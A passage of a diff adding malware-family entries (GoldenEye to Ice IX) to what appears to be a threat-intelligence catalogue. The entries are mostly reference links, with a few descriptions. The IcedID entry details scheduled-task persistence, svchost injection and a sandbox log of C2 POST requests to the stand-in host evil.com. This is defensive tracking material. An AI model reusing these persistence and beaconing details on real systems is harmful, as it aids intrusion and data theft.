"http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html", + "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" + ] + }, + "uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb", + "value": "GoldenEye", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", + "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" + ] + }, + "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", + "value": "GoldDragon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted", + "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" + ] + }, + "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", + "value": "Golroted", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Fuerboos" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", + "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" + ] + }, + "uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5", + "value": "Goodor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat", + "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf" + ] + }, + "uuid": "d1298818-6425-49be-9764-9f119d964efd", + "value": "GoogleDrive RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic", + "https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/" + ] + }, + "uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181", + "value": "GooPic Drooper", + "description": "" + }, + { + "meta": { + "synonyms": [ + "talalpek", + "Xswkit" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", + "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669", + "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", + "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", + "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", + "https://www.us-cert.gov/ncas/alerts/TA16-336A", + "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", + "https://www.youtube.com/watch?v=242Tn0IL2jE", + "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", + "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", + "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", + "https://news.drweb.com/show/?i=4338&lng=en", + "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/", + "https://www.youtube.com/watch?v=QgUlPvEE4aw", + "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055" + ] + }, + "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", + "value": "GootKit", + "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat", + "https://www.yumpu.com/en/document/view/55930175/govrat-v20" + ] + }, + "uuid": "9fbb5822-1660-4651-9f57-b6f83a881786", + "value": "GovRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CRM", + "Gozi CRM", + "Papras", + "Snifula", + "Ursnif" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", + "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/", + "https://www.secureworks.com/research/gozi", + "https://lokalhost.pl/gozi_tree.txt", + "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html" + ] + }, + "uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c", + "value": "Gozi", + "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode", + "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2", + "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", + "https://de.securelist.com/analysis/59479/erpresser/", + "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", + "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/" + ] + }, + "uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52", + "value": "GPCode", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot", + "http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data" + ] + }, + "uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb", + "value": "GrabBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor", + "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" + ] + }, + "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", + "value": "Graftor", + "description": "" + }, + { + "meta": { + "synonyms": [ + "FrameworkPOS", + "trinity" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", + "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season" + ] + }, + "uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063", + "value": "Grateful POS", + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem", + "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" + ] + }, + "uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8", + "value": "Gratem", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", + "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", + "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" + ] + }, + "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", + "value": "Gravity RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "eoehttp" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan", + "https://blog.cylance.com/spear-a-threat-actor-resurfaces" + ] + }, + "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", + "value": "GreenShaitan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok", + "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" + ] + }, + "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", + "value": "GROK", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump", + "https://attack.mitre.org/wiki/Technique/T1003" + ] + }, + "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", + "value": "gsecdump", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1", + "https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" + ] + }, + "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", + "value": "H1N1 Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc", + "value": "Hacksfase", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy", + "https://github.com/ratty3697/HackSpy-Trojan-Exploit" + ] + }, + "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", + "value": "HackSpy", + "description": "Py2Exe based tool as found on github." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", + "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" + ] + }, + "uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e", + "value": "Hamweq", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Chanitor" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", + "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", + "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", + "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", + "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak" + ] + }, + "uuid": "4166ab63-24b0-4448-92ea-21c8deef978d", + "value": "Hancitor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker" + ] + }, + "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", + "value": "HappyLocker (HiddenTear?)", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Piptea" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig", + "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html", + "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html" + ] + }, + "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", + "value": "Harnig", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", + "https://www.f-secure.com/weblog/archives/00002718.html" + ] + }, + "uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a", + "value": "Havex RAT", + "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries." + }, + { + "meta": { + "synonyms": [ + "Predator Pain" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", + "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", + "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", + "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/", + "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/" + ] + }, + "uuid": "31615066-dbff-4134-b467-d97a337b408b", + "value": "HawkEye Keylogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", + "value": "Helauto", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html" + ] + }, + "uuid": "19d89300-ff97-4281-ac42-76542e744092", + "value": "Helminth", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag", + "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/", + "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/" + ] + }, + "uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625", + "value": "Heloag", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst", + "https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware" + ] + }, + "uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a", + "value": "Herbst", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b", + "value": "Heriplor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", + "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ] + }, + "uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8", + "value": "Hermes", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ] + }, + "uuid": "4d8da0af-cfd7-4990-b211-af0e9906eca0", + "value": "Hermes Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes" + ] + }, + "uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21", + "value": "HerpesBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot" + ] + }, + "uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3", + "value": "HesperBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", + "https://github.com/goliate/hidden-tear", + "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", + "https://twitter.com/struppigel/status/950787783353884672" + ] + }, + "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", + "value": "HiddenTear", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" + ] + }, + "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", + "value": "HideDRV", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", + "https://www.recordedfuture.com/hidden-lynx-analysis/", + "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" + ] + }, + "uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1", + "value": "HiKit", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan", + "https://www.checkpoint.com/threatcloud-central/downloads/check-point-himan-malware-analysis.pdf" + ] + }, + "uuid": "ecad37b9-555a-4029-b181-6f272eed7154", + "value": "himan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat", + "https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat" + ] + }, + "uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab", + "value": "Hi-Zor RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux" + ] + }, + "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", + "value": "HLUX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", + "value": "homefry", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot" + ] + }, + "uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f", + "value": "HtBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat", + "https://www.riskiq.com/blog/labs/htprat/" + ] + }, + "uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0", + "value": "htpRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "HUC Packet Transmit Tool" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", + "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", + "https://www.secureworks.com/research/htran" + ] + }, + "uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8", + "value": "HTran", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser", + "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/" + ] + }, + "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", + "value": "HttpBrowser", + "description": "" + }, + { + "meta": { + "synonyms": [ + "httpdr0pper" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper", + "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf", + "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787" + ] + }, + "uuid": "78336551-c18e-47ac-8bef-1c0c61c0e0a9", + "value": "httpdropper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy", + "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", + "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" + ] + }, + "uuid": "339b3e7c-7a4a-4a1a-94b6-555f15a0b265", + "value": "http_troy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "houdini" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" + ] + }, + "uuid": "94466a80-964f-467e-b4b3-0e1375174464", + "value": "Hworm", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", + "https://securelist.com/luckymouse-hits-national-data-center/86083/" + ] + }, + "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", + "value": "HyperBro", + "description": "" + }, + { + "meta": { + "synonyms": [ + "BokBot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", + "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", + "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid", + "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", + "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" + ] + }, + "uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330", + "value": "IcedID", + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader", + "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/" + ] + }, + "uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16", + "value": "IcedID Downloader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog", + "http://www.kz-cert.kz/page/502" + ] + }, + "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861", + "value": "Icefog", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix", + "https://securelist.com/ice-ix-not-cool-at-all/29111/", + "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus", + "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/" + ] + }, + "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3", + "value": "Ice IX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 